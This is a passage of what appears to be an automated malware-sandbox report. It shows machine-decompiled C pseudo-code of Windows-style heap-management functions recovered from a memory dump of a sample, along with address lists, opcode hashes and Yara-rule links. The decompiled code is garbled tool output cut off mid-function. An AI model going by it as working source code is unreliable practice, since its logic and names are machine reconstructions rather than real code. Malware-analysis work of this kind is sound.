				_t8 = _t77 + 0x34; // 0xdce0ba00
				if(_t45 !=  *_t8) {
					goto L22;
				}
				_t9 = _t77 + 0x24; // 0x1808504
				E01732280(_t9, _t9);
				_t87 = 0x78;
				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
				E0175FA60( &_v156, 0, _t87);
				_t13 = _t77 + 0x30; // 0x3db8
				_t85 =  &_v156;
				_v36 =  *_t13;
				_v28 = _v168;
				_v32 = 0;
				_v24 = 0;
				_v20 = _v158;
				_v160 = 0;
				while(1) {
					_push( &_v164);
					_push(_t87);
					_push(_t85);
					_push(0x18);
					_push( &_v36);
					_push(0x1e);
					_t88 = E0175B0B0();
					if(_t88 != 0xc0000023) {
						break;
					}
					if(_t85 !=  &_v156) {
						L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
					}
					_t84 = L01734620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
					_v168 = _v164;
					if(_t84 == 0) {
						_t88 = 0xc0000017;
						goto L19;
					} else {
						_t74 = _v160 + 1;
						_v160 = _t74;
						if(_t74 >= 0x10) {
							L19:
							_t86 = L0171CCC0(_t88);
							if(_t86 != 0) {
								L8:
								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
								_t30 = _t77 + 0x24; // 0x1808504
								L0172FFB0(_t77, _t84, _t30);
								if(_t84 != 0 && _t84 !=  &_v156) {
									L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
								}
								if(_t86 != 0) {
									goto L12;
								} else {
									goto L11;
								}
							}
							L6:
							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
							if(_v164 != 0) {
								_t83 = _t84;
								L01744F49(_t77, _t84);
							}
							goto L8;
						}
						_t87 = _v168;
						continue;
					}
				}
				if(_t88 != 0) {
					goto L19;
				}
				goto L6;
			}

0x01744bad
0x01744bbf
0x01744bc2
0x01744bc6
0x01744bcd
0x01744bd9
0x017867fe
0x01786800
0x01744ccc
0x01744ccd
0x01744cb7
0x01744cc9
0x01744cc9
0x01744bdf
0x01744be5
0x00000000
0x00000000
0x01744beb
0x01744bef
0x00000000
0x00000000
0x01744bf5
0x01744bf9
0x01744c06
0x01744c0b
0x01744c17
0x01744c1c
0x01744c1f
0x01744c25
0x01744c33
0x01744c3d
0x01744c40
0x01744c43
0x01744c47
0x01744c4d
0x01744c53
0x01744c54
0x01744c55
0x01744c56
0x01744c5b
0x01744c5c
0x01744c63
0x01744c6b
0x00000000
0x00000000
0x01786776
0x01786784
0x01786784
0x0178679f
0x017867a7
0x017867af
0x017867ce
0x00000000
0x017867b1
0x017867b7
0x017867b8
0x017867c1
0x017867d3
0x017867d9
0x017867dd
0x01744c94
0x01744c94
0x01744c98
0x01744c9c
0x01744ca3
0x017867f4
0x017867f4
0x01744cb5
0x00000000
0x00000000
0x00000000
0x00000000
0x01744cb5
0x01744c79
0x01744c7e
0x01744c89
0x01744c8b
0x01744c8f
0x01744c8f
0x00000000
0x01744c89
0x017867c3
0x00000000
0x017867c3
0x017867af
0x01744c73
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32d118bcd7837c744ebd18ddb7100b518f9b30845e27b457e3da73dc44f41c17
Instruction ID: 05d9c0070e58230edc09001b800dfde26ee6399035f69887be50b383c2bdccb1
Opcode Fuzzy Hash: 32d118bcd7837c744ebd18ddb7100b518f9b30845e27b457e3da73dc44f41c17
Instruction Fuzzy Hash: 7441C135A40229ABDB31EF68C944FEEF7B4EF45710F0500A5E909AB245EB74DE80CB95

Uniqueness

Uniqueness Score: -1.00%

Function 017E2B28 Relevance: .1, Instructions: 129
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E017E2B28(signed int __ecx, signed int __edx, signed int _a4, signed int _a8, intOrPtr* _a12) {
				char _v5;
				signed int _v12;
				signed int _v16;
				void* __ebx;
				void* __edi;
				signed int _t30;
				signed int _t35;
				unsigned int _t50;
				signed int _t52;
				signed int _t53;
				unsigned int _t58;
				signed int _t61;
				signed int _t63;
				signed int _t67;
				signed int _t69;
				intOrPtr _t75;
				signed int _t81;
				signed int _t87;
				void* _t88;
				signed int _t90;
				signed int _t93;

				_t69 = __ecx;
				_t30 = _a4;
				_t90 = __edx;
				_t81 = __ecx;
				_v12 = __ecx;
				_t87 = _t30 - 8;
				if(( *(__ecx + 0x38) & 0x00000001) != 0 && (_t30 & 0x00000fff) == 0) {
					_t87 = _t87 - 8;
				}
				_t67 = 0;
				if(_t90 != 0) {
					L14:
					if((0x0000abed ^  *(_t90 + 0x16)) ==  *((intOrPtr*)(_t90 + 0x14))) {
						_t75 = (( *_t87 ^  *0x1806110 ^ _t87) >> 0x00000001 & 0x00007fff) * 8 - 8;
						 *_a12 = _t75;
						_t35 = _a8 & 0x00000001;
						_v16 = _t35;
						if(_t35 == 0) {
							E01732280(_t35, _t81);
							_t81 = _v12;
						}
						_v5 = 0xff;
						if(( *_t87 ^  *0x1806110 ^ _t87) < 0) {
							_t91 = _v12;
							_t88 = L017E241A(_v12, _t90, _t87, _a8,  &_v5);
							if(_v16 == _t67) {
								L0172FFB0(_t67, _t88, _t91);
							}
							if(_t88 != 0) {
								E017E3209(_t91, _t88, _a8);
							}
							_t67 = 1;
						} else {
							_push(_t75);
							_push(_t67);
							E017DA80D( *((intOrPtr*)(_t81 + 0x20)), 8, _a4, _t87);
							if(_v16 == _t67) {
								L0172FFB0(_t67, _t87, _v12);
							}
						}
					} else {
						_push(_t69);
						_push(_t67);
						E017DA80D( *((intOrPtr*)(_t81 + 0x20)), 0x12, _t90, _t67);
					}
					return _t67;
				}
				_t69 =  *0x1806110; // 0xad807883
				_t93 = _t87;
				_t50 = _t69 ^ _t87 ^  *_t87;
				if(_t50 >= 0) {
					_t52 = _t50 >> 0x00000010 & 0x00007fff;
					if(_t52 == 0) {
						L12:
						_t53 = _t67;
						L13:
						_t90 = _t93 - (_t53 << 0x0000000c) & 0xfffff000;
						goto L14;
					}
					_t93 = _t87 - (_t52 << 3);
					_t58 =  *_t93 ^ _t69 ^ _t93;
					if(_t58 < 0) {
						L10:
						_t61 =  *(_t93 + 4) ^ _t69 ^ _t93;
						L11:
						_t53 = _t61 & 0x000000ff;
						goto L13;
					}
					_t63 = _t58 >> 0x00000010 & 0x00007fff;
					if(_t63 == 0) {
						goto L12;
					}
					_t93 = _t93 + _t63 * 0xfffffff8;
					goto L10;
				}
				_t61 =  *(_t87 + 4) ^ _t69 ^ _t87;
				goto L11;
			}

0x017e2b28
0x017e2b30
0x017e2b35
0x017e2b37
0x017e2b3a
0x017e2b3d
0x017e2b44
0x017e2b4d
0x017e2b4d
0x017e2b50
0x017e2b54
0x017e2bb0
0x017e2bbd
0x017e2be8
0x017e2bef
0x017e2bf4
0x017e2bf7
0x017e2bfa
0x017e2bfd
0x017e2c02
0x017e2c02
0x017e2c0f
0x017e2c13
0x017e2c3b
0x017e2c4a
0x017e2c4f
0x017e2c52
0x017e2c52
0x017e2c59
0x017e2c62
0x017e2c62
0x017e2c69
0x017e2c15
0x017e2c18
0x017e2c19
0x017e2c21
0x017e2c29
0x017e2c2f
0x017e2c2f
0x017e2c29
0x017e2bbf
0x017e2bc2
0x017e2bc3
0x017e2bc9
0x017e2bc9
0x017e2c72
0x017e2c72
0x017e2b56
0x017e2b5c
0x017e2b62
0x017e2b64
0x017e2b72
0x017e2b77
0x017e2ba3
0x017e2ba3
0x017e2ba5
0x017e2baa
0x00000000
0x017e2baa
0x017e2b7e
0x017e2b84
0x017e2b86
0x017e2b97
0x017e2b9c
0x017e2b9e
0x017e2b9e
0x00000000
0x017e2b9e
0x017e2b8b
0x017e2b90
0x00000000
0x00000000
0x017e2b95
0x00000000
0x017e2b95
0x017e2b6b
0x00000000

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 367096bfe5389df2e8d804dc722d4031f769ad85d2ae9ff649ee0dc2072c98f5
Instruction ID: 96e779ba0ed713b4798c0363c7355b3a9e99c98b6ed06fd68dafa5e59d4e3919
Opcode Fuzzy Hash: 367096bfe5389df2e8d804dc722d4031f769ad85d2ae9ff649ee0dc2072c98f5
Instruction Fuzzy Hash: 1F413973A105095BDB25CF6CC88897AF7EDFF4C620B108669E915CB286E674DD12C790

Uniqueness

Uniqueness Score: -1.00%

Function 017DAA16 Relevance: .1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E017DAA16(void* __ecx, intOrPtr __edx, signed int _a4, short _a8) {
				intOrPtr _v8;
				char _v12;
				signed int _v16;
				signed char _v20;
				intOrPtr _v24;
				char* _t37;
				void* _t47;
				signed char _t51;
				void* _t53;
				char _t55;
				intOrPtr _t57;
				signed char _t61;
				intOrPtr _t75;
				void* _t76;
				signed int _t81;
				intOrPtr _t82;

				_t53 = __ecx;
				_t55 = 0;
				_v20 = _v20 & 0;
				_t75 = __edx;
				_t81 = ( *(__ecx + 0xc) | _a4) & 0x93000f0b;
				_v24 = __edx;
				_v12 = 0;
				if((_t81 & 0x01000000) != 0) {
					L5:
					if(_a8 != 0) {
						_t81 = _t81 | 0x00000008;
					}
					_t57 = E017DABF4(_t55 + _t75, _t81);
					_v8 = _t57;
					if(_t57 < _t75 || _t75 > 0x7fffffff) {
						_t76 = 0;
						_v16 = _v16 & 0;
					} else {
						_t59 = _t53;
						_t76 = E017DAB54(_t53, _t75, _t57, _t81 & 0x13000003,  &_v16);
						if(_t76 != 0 && (_t81 & 0x30000f08) != 0) {
							_t47 = L017DAC78(_t53, _t76, _v24, _t59, _v12, _t81, _a8);
							_t61 = _v20;
							if(_t61 != 0) {
								 *(_t47 + 2) =  *(_t47 + 2) ^ ( *(_t47 + 2) ^ _t61) & 0x0000000f;
								if(E017BCB1E(_t61, _t53, _t76, 2, _t47 + 8) < 0) {
									L017377F0(_t53, 0, _t76);
									_t76 = 0;
								}
							}
						}
					}
					_t82 = _v8;
					L16:
					if(E01737D50() == 0) {
						_t37 = 0x7ffe0380;
					} else {
						_t37 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t37 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E017D131B(_t53, _t76, _t82, _v16);
					}
					return _t76;
				}
				_t51 =  *(__ecx + 0x20);
				_v20 = _t51;
				if(_t51 == 0) {
					goto L5;
				}
				_t81 = _t81 | 0x00000008;
				if(E017BCB1E(_t51, __ecx, 0, 1,  &_v12) >= 0) {
					_t55 = _v12;
					goto L5;
				} else {
					_t82 = 0;
					_t76 = 0;
					_v16 = _v16 & 0;
					goto L16;
				}
			}

0x017daa1f
0x017daa21
0x017daa23
0x017daa2b
0x017daa30
0x017daa36
0x017daa39
0x017daa42
0x017daa75
0x017daa7a
0x017daa7c
0x017daa7c
0x017daa88
0x017daa8a
0x017daa8f
0x017dab02
0x017dab04
0x017daa99
0x017daaa8
0x017daaaf
0x017daab3
0x017daacc
0x017daad1
0x017daad6
0x017daae0
0x017daaf3
0x017daaf9
0x017daafe
0x017daafe
0x017daaf3
0x017daad6
0x017daab3
0x017dab07
0x017dab0a
0x017dab11
0x017dab23
0x017dab13
0x017dab1c
0x017dab1c
0x017dab2b
0x017dab44
0x017dab44
0x017dab51
0x017dab51
0x017daa44
0x017daa47
0x017daa4c
0x00000000
0x00000000
0x017daa5a
0x017daa64
0x017daa72
0x00000000
0x017daa66
0x017daa66
0x017daa68
0x017daa6a
0x00000000
0x017daa6a

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
Instruction ID: 55b022e0b1b4f18e58d84dabf72b7432a986279a0ef265d8d1b5c0fbe51237a0
Opcode Fuzzy Hash: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
Instruction Fuzzy Hash: 5131D132B0024D6BEB158B69C849FAFFBBBFF85210F058469E905A7291DB74DE42C750

Uniqueness

Uniqueness Score: -1.00%

Function 01728A0A Relevance: .1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E01728A0A(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v524;
				signed int _v528;
				void* _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t44;
				void* _t46;
				void* _t48;
				signed int _t53;
				signed int _t55;
				intOrPtr* _t62;
				void* _t63;
				unsigned int _t75;
				signed int _t79;
				unsigned int _t81;
				unsigned int _t83;
				signed int _t84;
				void* _t87;

				_t76 = __edx;
				_v8 =  *0x180d360 ^ _t84;
				_v536 = 0x200;
				_t79 = 0;
				_v548 = __edx;
				_v544 = 0;
				_t62 = __ecx;
				_v540 = 0;
				_v532 =  &_v524;
				if(__edx == 0 || __ecx == 0) {
					L6:
					return L0175B640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
				} else {
					_v528 = 0;
					E0172E9C0(1, __ecx, 0, 0,  &_v528);
					_t44 = _v528;
					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
					_t46 = 0xa;
					_t87 = _t81 - _t46;
					if(_t87 > 0 || _t87 == 0) {
						 *_v548 = 0x16f1180;
						L5:
						_t79 = 1;
						goto L6;
					} else {
						_t48 = L01741DB5(_t62,  &_v532,  &_v536);
						_t76 = _v528;
						if(_t48 == 0) {
							L9:
							L01753C2A(_t81, _t76,  &_v544);
							 *_v548 = _v544;
							goto L5;
						}
						_t62 = _v532;
						if(_t62 != 0) {
							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
							_t53 =  *_t62;
							_v528 = _t53;
							if(_t53 != 0) {
								_t63 = _t62 + 4;
								_t55 = _v528;
								do {
									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
										if(E01728999(_t63,  &_v540) == 0) {
											_t55 = _v528;
										} else {
											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
											_t55 = _v528;
											if(_t75 >= _t83) {
												_t83 = _t75;
											}
										}
									}
									_t63 = _t63 + 0x14;
									_t55 = _t55 - 1;
									_v528 = _t55;
								} while (_t55 != 0);
								_t62 = _v532;
							}
							if(_t62 !=  &_v524) {
								L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
							}
							_t76 = _t83 & 0x0000ffff;
							_t81 = _t83 >> 0x10;
						}
						goto L9;
					}
				}
			}

0x01728a0a
0x01728a1c
0x01728a23
0x01728a2e
0x01728a30
0x01728a36
0x01728a3c
0x01728a3e
0x01728a4a
0x01728a52
0x01728a9c
0x01728aae
0x01728a58
0x01728a5e
0x01728a6a
0x01728a6f
0x01728a75
0x01728a7d
0x01728a85
0x01728a86
0x01728a89
0x01728a93
0x01728a99
0x01728a9b
0x00000000
0x01728aaf
0x01728abe
0x01728ac3
0x01728acb
0x01728ad7
0x01728ae0
0x01728af1
0x00000000
0x01728af1
0x01728acd
0x01728ad5
0x01728afb
0x01728afd
0x01728aff
0x01728b07
0x01728b22
0x01728b24
0x01728b2a
0x01728b2e
0x01728b3f
0x01728b78
0x01728b41
0x01728b52
0x01728b54
0x01728b5c
0x01728b74
0x01728b74
0x01728b5c
0x01728b3f
0x01728b5e
0x01728b61
0x01728b64
0x01728b64
0x01728b6c
0x01728b6c
0x01728b11
0x01779cd5
0x01779cd5
0x01728b17
0x01728b1a
0x01728b1a
0x00000000
0x01728ad5
0x01728a89

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a152b4f0131721d4e28618758c40c47d1c422bfe405331a50fcc9cd88fc681d1
Instruction ID: 6cd9ec282db7057eff166cb22f0dfa85276d472a70f5f6e222ae5e3fd032e3a0
Opcode Fuzzy Hash: a152b4f0131721d4e28618758c40c47d1c422bfe405331a50fcc9cd88fc681d1
Instruction Fuzzy Hash: AA41A1B1A0023C9BDB24CF19CC88AA9F7F4FB54300F1042EAD91997242EB719E81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 017DFDE2 Relevance: .1, Instructions: 116
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E017DFDE2(signed int* __ecx, signed int __edx, signed int _a4) {
				char _v8;
				signed int _v12;
				signed int _t29;
				char* _t32;
				char* _t43;
				signed int _t80;
				signed int* _t84;

				_push(__ecx);
				_push(__ecx);
				_t56 = __edx;
				_t84 = __ecx;
				_t80 = E017DFD4E(__ecx, __edx);
				_v12 = _t80;
				if(_t80 != 0) {
					_t29 =  *__ecx & _t80;
					_t74 = (_t80 - _t29 >> 4 << __ecx[1]) + _t29;
					if(__edx <= (_t80 - _t29 >> 4 << __ecx[1]) + _t29) {
						E017E0A13(__ecx, _t80, 0, _a4);
						_t80 = 1;
						if(E01737D50() == 0) {
							_t32 = 0x7ffe0380;
						} else {
							_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
							_push(3);
							L21:
							L017D1608( *((intOrPtr*)(_t84 + 0x3c)), _t56);
						}
						goto L22;
					}
					if(( *(_t80 + 0xc) & 0x0000000c) != 8) {
						_t80 = E017E2B28(__ecx[0xc], _t74, __edx, _a4,  &_v8);
						if(_t80 != 0) {
							_t66 =  *((intOrPtr*)(_t84 + 0x2c));
							_t77 = _v8;
							if(_v8 <=  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x2c)) + 0x28)) - 8) {
								E017DC8F7(_t66, _t77, 0);
							}
						}
					} else {
						_t80 = E017DDBD2(__ecx[0xb], _t74, __edx, _a4);
					}
					if(E01737D50() == 0) {
						_t43 = 0x7ffe0380;
					} else {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t43 == 0 || ( *( *[fs:0x30] + 0x240) & 0x00000001) == 0 || _t80 == 0) {
						goto L22;
					} else {
						_push((0 | ( *(_v12 + 0xc) & 0x0000000c) != 0x00000008) + 2);
						goto L21;
					}
				} else {
					_push(__ecx);
					_push(_t80);
					E017DA80D(__ecx[0xf], 9, __edx, _t80);
					L22:
					return _t80;
				}
			}

0x017dfde7
0x017dfde8
0x017dfdec
0x017dfdee
0x017dfdf5
0x017dfdf7
0x017dfdfc
0x017dfe19
0x017dfe22
0x017dfe26
0x017dfec6
0x017dfecd
0x017dfed5
0x017dfee7
0x017dfed7
0x017dfee0
0x017dfee0
0x017dfeef
0x017dff00
0x017dff02
0x017dff07
0x017dff07
0x00000000
0x017dfeef
0x017dfe33
0x017dfe55
0x017dfe59
0x017dfe5b
0x017dfe5e
0x017dfe69
0x017dfe6d
0x017dfe6d
0x017dfe69
0x017dfe35
0x017dfe41
0x017dfe41
0x017dfe79
0x017dfe8b
0x017dfe7b
0x017dfe84
0x017dfe84
0x017dfe93
0x00000000
0x017dfea8
0x017dfeba
0x00000000
0x017dfeba
0x017dfdfe
0x017dfe01
0x017dfe02
0x017dfe08
0x017dff0c
0x017dff14
0x017dff14

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
Instruction ID: 1aa1d18b4704caebb32183a892d544bc02407e50b0873c98f84ed7e1be5ce597
Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
Instruction Fuzzy Hash: 4C3108323006496FD722976CC849F6AFBFAEBC9650F184198E9479B386DA74DC42C760

Uniqueness

Uniqueness Score: -1.00%

Function 017E22AE Relevance: .1, Instructions: 116
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E017E22AE(unsigned int* __ecx, intOrPtr __edx, void* __eflags, signed int _a4, signed int _a8, char* _a12) {
				signed int _v8;
				signed int _v12;
				signed char _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				signed char _t50;
				signed int _t53;
				signed char _t63;
				signed char _t71;
				signed char _t75;
				signed int _t77;
				unsigned int _t106;
				unsigned int* _t114;
				signed int _t117;

				_v20 = _v20 & 0x00000000;
				_t117 = _a4;
				_t114 = __ecx;
				_v24 = __edx;
				E017E21E8(_t117, __edx,  &_v16,  &_v12);
				if(_v24 != 0 && (_v12 | _v8) != 0) {
					_t71 =  !_v8;
					_v16 =  !_v12 >> 8 >> 8;
					_t72 = _t71 >> 8;
					_t50 = _v16;
					_t20 = (_t50 >> 8) + 0x16fac00; // 0x6070708
					_t75 = ( *((intOrPtr*)((_t71 >> 8 >> 8 >> 8) + 0x16fac00)) +  *((intOrPtr*)((_t71 >> 0x00000008 >> 0x00000008 & 0x000000ff) + 0x16fac00)) +  *((intOrPtr*)((_t71 & 0x000000ff) + 0x16fac00)) +  *((intOrPtr*)((_t72 & 0x000000ff) + 0x16fac00)) & 0x000000ff) + ( *_t20 +  *((intOrPtr*)((_t50 & 0x000000ff) + 0x16fac00)) +  *((intOrPtr*)((_t71 & 0x000000ff) + 0x16fac00)) +  *((intOrPtr*)((_t72 & 0x000000ff) + 0x16fac00)) & 0x000000ff);
					_v16 = _t75;
					if(( *(__ecx + 0x38) & 0x00000002) != 0) {
						L6:
						_t53 =  *0x1806110; // 0xad807883
						 *_t117 = ( !_t53 ^  *_t117 ^ _t117) & 0x7fffffff ^  !_t53 ^ _t117;
						 *(_t117 + 4) = (_t117 - _v24 >> 0x0000000c ^  *0x1806110 ^ _t117) & 0x000000ff | 0x00000200;
						_t77 = _a8 & 0x00000001;
						if(_t77 == 0) {
							L0172FFB0(_t77, _t114, _t114);
						}
						_t63 = L017E2FBD(_t114, _v24, _v12, _v8, _v16, 0);
						_v36 = 1;
						if(_t77 == 0) {
							E01732280(_t63, _t114);
						}
						 *(_t117 + 4) =  *(_t117 + 4) & 0xfffffdff;
						 *_a12 = 0xff;
					} else {
						_t106 =  *(__ecx + 0x18) >> 7;
						if(_t106 <= 8) {
							_t106 = 8;
						}
						if( *((intOrPtr*)(_t114 + 0x1c)) + _t75 > _t106) {
							goto L6;
						}
					}
				}
				return _v20;
			}

0x017e22b9
0x017e22c2
0x017e22c6
0x017e22c8
0x017e22d8
0x017e22e2
0x017e2303
0x017e2314
0x017e2321
0x017e234a
0x017e235b
0x017e236c
0x017e2372
0x017e2376
0x017e238f
0x017e238f
0x017e23b4
0x017e23c6
0x017e23c9
0x017e23cc
0x017e23cf
0x017e23cf
0x017e23e9
0x017e23ee
0x017e23f8
0x017e23fb
0x017e23fb
0x017e2403
0x017e240a
0x017e2378
0x017e237b
0x017e2381
0x017e2385
0x017e2385
0x017e238d
0x00000000
0x00000000
0x017e238d
0x017e2376
0x017e2417

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2073759e1d318e0c08e084e2f72b42f2bd0823289eaf1cea5bf0bfa314181af
Instruction ID: be04d94f9d5c80931f4f410bb0e68e441a044f971b5d7fc5761c4d7508f7f88d
Opcode Fuzzy Hash: d2073759e1d318e0c08e084e2f72b42f2bd0823289eaf1cea5bf0bfa314181af
Instruction Fuzzy Hash: 294104711143424BC305DF28C8A9A7ABBE4EF89225F06465DF4D58B2D2CE34D819CB92

Uniqueness

Uniqueness Score: -1.00%

Function 017E20A8 Relevance: .1, Instructions: 114
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E017E20A8(intOrPtr __ecx, intOrPtr __edx, signed int _a4, signed int* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _t35;
				signed int _t57;
				unsigned int _t61;
				signed int _t63;
				signed int _t64;
				signed int _t73;
				signed int _t77;
				signed int _t80;
				signed int _t83;
				signed int _t84;
				unsigned int _t92;
				unsigned int _t97;
				signed int _t100;
				unsigned int _t102;

				_t79 = __edx;
				_t35 =  *0x1806110; // 0xad807883
				_t57 = _a4;
				_v8 = __ecx;
				_t84 =  *_t57;
				_v12 = __edx;
				_t61 = _t84 ^ _t35 ^ _t57;
				_t83 = _t61 >> 0x00000001 & 0x00007fff;
				_v20 = _t83;
				 *_t57 = (_t84 ^ _t35 ^ _t57) & 0x7fffffff ^ _t35 ^ _t57;
				_t63 = _t61 >> 0x00000010 & 0x00007fff;
				if(_t63 != 0) {
					_t100 =  *0x1806110; // 0xad807883
					_t77 = _t57 - (_t63 << 3);
					_v16 = _t77;
					_t102 = _t100 ^ _t77 ^  *_t77;
					_t106 = _t102;
					if(_t102 >= 0) {
						L017E2E3F(_v8, __edx, _t106, _t77);
						_t57 = _v16;
						_t79 = _v12;
						_t83 = _t83 + (_t102 >> 0x00000001 & 0x00007fff);
					}
				}
				_t64 = _t57 + _t83 * 8;
				if(_t64 < _t79 + (( *(_t79 + 0x14) & 0x0000ffff) + 3) * 8) {
					asm("lfence");
					_t97 =  *_t64 ^  *0x1806110 ^ _t64;
					_t109 = _t97;
					if(_t97 >= 0) {
						L017E2E3F(_v8, _t79, _t109, _t64);
						_t79 = _v12;
						_t83 = _t83 + (_t97 >> 0x00000001 & 0x00007fff);
					}
				}
				if(( *(_v8 + 0x38) & 0x00000001) != 0) {
					_t73 = _t57 + _t83 * 8;
					if(_t73 < _t79 + (( *(_t79 + 0x14) & 0x0000ffff) + 3) * 8) {
						asm("lfence");
						_t92 =  *_t73 ^  *0x1806110 ^ _t73;
						_t113 = _t92;
						if(_t92 >= 0) {
							L017E2E3F(_v8, _t79, _t113, _t73);
							_t83 = _t83 + (_t92 >> 0x00000001 & 0x00007fff);
						}
					}
				}
				if(_v20 != _t83) {
					_t66 = _v12;
					_t80 = _t57 + _t83 * 8;
					 *_t57 =  *_t57 ^ (_t83 + _t83 ^  *_t57 ^  *0x1806110 ^ _t57) & 0x0000fffe;
					if(_t80 < _v12 + (( *(_t66 + 0x14) & 0x0000ffff) + 3) * 8) {
						 *_t80 =  *_t80 ^ (_t83 << 0x00000010 ^  *_t80 ^  *0x1806110 ^ _t80) & 0x7fff0000;
					}
				}
				 *_a8 = _t83;
				return _t57;
			}

0x017e20a8
0x017e20b0
0x017e20b6
0x017e20ba
0x017e20be
0x017e20c4
0x017e20cb
0x017e20db
0x017e20e4
0x017e20e7
0x017e20e9
0x017e20ef
0x017e20f1
0x017e20fe
0x017e2102
0x017e2105
0x017e2105
0x017e2107
0x017e210d
0x017e2112
0x017e2115
0x017e2120
0x017e2120
0x017e2107
0x017e2126
0x017e2131
0x017e2133
0x017e213e
0x017e213e
0x017e2140
0x017e2146
0x017e214b
0x017e2156
0x017e2156
0x017e2140
0x017e215f
0x017e2165
0x017e2170
0x017e2172
0x017e217d
0x017e217d
0x017e217f
0x017e2185
0x017e2192
0x017e2192
0x017e217f
0x017e2170
0x017e2197
0x017e2199
0x017e21a1
0x017e21b1
0x017e21bf
0x017e21d6
0x017e21d6
0x017e21bf
0x017e21dd
0x017e21e5

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78b1f6af34ff6c11ba30086088327e4418139944abbc667c61e926eb2b410134
Instruction ID: c48a9684b0961f8386ae5b857d2069f13b9b1e891656218e1087677604d05fa2
Opcode Fuzzy Hash: 78b1f6af34ff6c11ba30086088327e4418139944abbc667c61e926eb2b410134
Instruction Fuzzy Hash: B041B233E0042A8BCB18CF68C495579F7F6FB4C30576601BDD905AB286EB34AE51CB90

Uniqueness

Uniqueness Score: -1.00%

Function 017E2D07 Relevance: .1, Instructions: 112
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E017E2D07(void* __ecx, void* __edx, void* __eflags, signed short _a4) {
				char _v5;
				signed char _v12;
				signed int _v16;
				signed int _v20;
				signed int* _v24;
				signed int _t34;
				signed char _t40;
				signed int* _t49;
				signed int _t55;
				signed char _t57;
				signed char _t58;
				signed char _t59;
				signed short _t60;
				unsigned int _t66;
				unsigned int _t71;
				signed int _t77;
				signed char _t83;
				signed char _t84;
				signed int _t91;
				signed int _t93;
				signed int _t96;

				_t34 = E017E21E8(_a4, __edx,  &_v24,  &_v20);
